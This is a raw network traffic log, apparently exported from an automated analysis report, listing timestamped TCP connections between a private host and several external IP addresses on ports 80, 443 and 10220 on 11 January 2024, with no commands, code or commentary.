                                                                                                                                                  Jan 11, 2024 13:35:04.983146906 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983175039 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983189106 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983218908 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983263016 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983305931 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983350039 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983357906 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983398914 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983427048 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983469963 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983491898 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983541012 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:04.983568907 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:04.983622074 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.185905933 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.185942888 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.185961962 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.185980082 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186002016 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186024904 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186059952 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186135054 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186173916 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186180115 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186223030 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186352968 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186408043 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186419010 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186460972 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186463118 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186511993 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186589003 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186636925 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186664104 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186716080 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186727047 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186764956 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186768055 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186810970 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186852932 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186892986 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186896086 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186939001 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.186949015 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186980963 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.186997890 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187020063 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187057972 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187105894 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187114000 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187156916 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187177896 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187226057 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187236071 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187274933 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187300920 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187340975 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187360048 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187406063 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187421083 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187473059 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187563896 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187621117 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187623978 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187664986 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187709093 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187756062 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187797070 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187840939 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187881947 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187928915 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.187937975 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187983990 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.187985897 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.188040972 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.188070059 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.188087940 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.188103914 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.188143015 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.188148975 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.188196898 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.188241959 CET4970880192.168.2.11211.40.39.251
                                                                                                                                                  Jan 11, 2024 13:35:05.489346027 CET4971180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:05.494005919 CET8049708211.40.39.251192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.699712992 CET8049711109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.699790955 CET4971180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:05.700206995 CET4971180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:05.880305052 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:05.880407095 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.880510092 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:05.888638973 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:05.888654947 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.910593033 CET8049711109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:05.910706997 CET4971180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:05.910787106 CET4971180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:06.120636940 CET8049711109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.256340981 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.256489992 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.353132963 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.353243113 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.353512049 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.353590012 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.354931116 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.401906967 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.726866007 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.726883888 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.726948023 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.726958036 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.726967096 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.727031946 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.738497972 CET49712443192.168.2.11149.154.167.99
                                                                                                                                                  Jan 11, 2024 13:35:06.738512993 CET44349712149.154.167.99192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.766695976 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:06.955482960 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:06.955574036 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:06.956162930 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:06.975897074 CET4971480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:06.976444006 CET4971580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.144550085 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.158202887 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.158221960 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.158288002 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:07.184911966 CET8049715109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.185007095 CET4971580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.185569048 CET8049714109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.185623884 CET4971480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.191318035 CET4971480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.193371058 CET4971580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.402132988 CET8049715109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.402204037 CET4971580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.402282953 CET4971580192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.402498960 CET8049714109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.402548075 CET4971480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.402602911 CET4971480192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:07.610418081 CET8049715109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.612296104 CET8049714109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.802962065 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:07.992258072 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:07.993570089 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:07.994049072 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.223407030 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:08.428390980 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:08.428653955 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.432893038 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.621756077 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:08.622914076 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.633986950 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.822608948 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:08.822829962 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:08.822905064 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.951694965 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:08.953896999 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:09.142437935 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:09.448340893 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:09.448463917 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.040616989 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.041560888 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.229466915 CET102204971349.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.229541063 CET4971310220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.229964972 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.230086088 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.230494976 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.423237085 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.423301935 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.423383951 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.423707962 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.427114010 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.615737915 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.749674082 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.749705076 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.749789000 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.765440941 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.765456915 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.933392048 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.933420897 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.933490038 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.935105085 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.935772896 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:11.965720892 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.965809107 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.971199036 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.971209049 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.971471071 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:11.971524000 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:11.973916054 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:12.017909050 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.123642921 CET102204971749.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.123718023 CET4971710220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.124109983 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.124182940 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.124691010 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.313409090 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.313445091 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.313546896 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.313882113 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.316220045 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.458249092 CET4972180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.463222980 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.463330984 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.463344097 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:12.463407993 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:12.463635921 CET49719443192.168.2.11172.67.139.220
                                                                                                                                                  Jan 11, 2024 13:35:12.463653088 CET44349719172.67.139.220192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.464298010 CET4972280192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.504878998 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.671685934 CET8049722109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.671794891 CET4972280192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.672087908 CET4972280192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.678239107 CET8049721109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.678461075 CET4972180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.678596020 CET4972180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.813590050 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.813656092 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.813673019 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.813697100 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.813736916 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.813741922 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.813741922 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.813791990 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.879802942 CET8049722109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.880080938 CET4972280192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.888156891 CET4972280192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.897922039 CET8049721109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:12.898027897 CET4972180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.906367064 CET4972180192.168.2.11109.175.29.39
                                                                                                                                                  Jan 11, 2024 13:35:12.938427925 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:12.939892054 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.095532894 CET8049722109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.124548912 CET8049721109.175.29.39192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.127197027 CET102204971849.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.127253056 CET4971810220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.128355026 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.128480911 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.129237890 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.317961931 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.318124056 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.318171024 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.318485022 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.321252108 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.321403980 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:13.509979963 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.510006905 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.515516996 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.905214071 CET102204972449.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:13.905278921 CET4972410220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.213624954 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.214276075 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.402359962 CET102204972049.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.402460098 CET4972010220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.402589083 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.402667046 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.404745102 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.592989922 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.593281031 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.593497038 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.594032049 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.691133976 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.823437929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.879698038 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880338907 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880382061 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880410910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880420923 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880451918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880481005 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880661964 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880718946 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880750895 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880791903 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880815983 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880840063 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880867958 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880908012 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880934000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880945921 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.880949020 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.880994081 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:14.881019115 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:14.881274939 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069021940 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069060087 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069081068 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069113016 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069113016 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069139957 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069144011 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069195032 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069225073 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069277048 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069317102 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069322109 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069356918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069392920 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069468975 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069504976 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069525957 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069549084 CET102204973149.12.114.15192.168.2.11
